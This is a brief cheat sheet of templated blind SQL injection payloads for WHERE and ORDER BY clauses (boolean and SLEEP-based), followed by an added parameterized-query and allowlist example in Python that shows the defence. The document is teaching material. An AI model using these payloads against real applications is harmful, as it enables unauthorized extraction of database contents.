Injection by clause
A list of payloads to properly understand how the injection can be carried out depending on the clause.
WHERE (most common)
Boolean
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y;
Blind Time-Based
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337);
ORDER BY
Boolean
[...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END));
The order of the displayed contents reveals whether the subquery evaluated to true or false.
Blind Time-Based
[...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337));
The number of seconds passed to the sleep function is multiplied by the number of rows returned by the main query.
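The defensive counterpart to the WHERE and ORDER BY cases above, as an added example that is not part of the original page: the WHERE value is bound as a parameter, and because identifiers cannot be bound, the ORDER BY column is resolved through an allowlist. The products table, its columns and the list_products helper are assumptions made for illustration, using Python's sqlite3 module.

```python
import sqlite3

# Hypothetical mapping from the sort keys the application accepts to real
# column names. Identifiers cannot be bound as parameters, so ORDER BY needs
# an allowlist instead.
SORT_COLUMNS = {"name": "name", "price": "price"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_db():
    """Build a small in-memory table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, price INTEGER, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [("widget", 30, "tools"), ("anvil", 90, "tools"), ("apple", 2, "food")],
    )
    return conn


def list_products(conn, category, sort="name", direction="asc"):
    """Return product names; user input never becomes SQL text."""
    try:
        column = SORT_COLUMNS[sort.lower()]
        order = SORT_DIRECTIONS[direction.lower()]
    except (KeyError, AttributeError):
        # Anything outside the allowlist (expressions, subqueries,
        # function calls) is refused before a query is built.
        raise ValueError("unsupported sort option") from None
    # Only allowlisted constants are interpolated; the WHERE value is bound.
    sql = f"SELECT name FROM products WHERE category = ? ORDER BY {column} {order}"
    return [row[0] for row in conn.execute(sql, (category,))]
```

With this shape, a WHERE-style payload is compared as a literal string and matches no rows, and an ORDER BY expression never reaches the database.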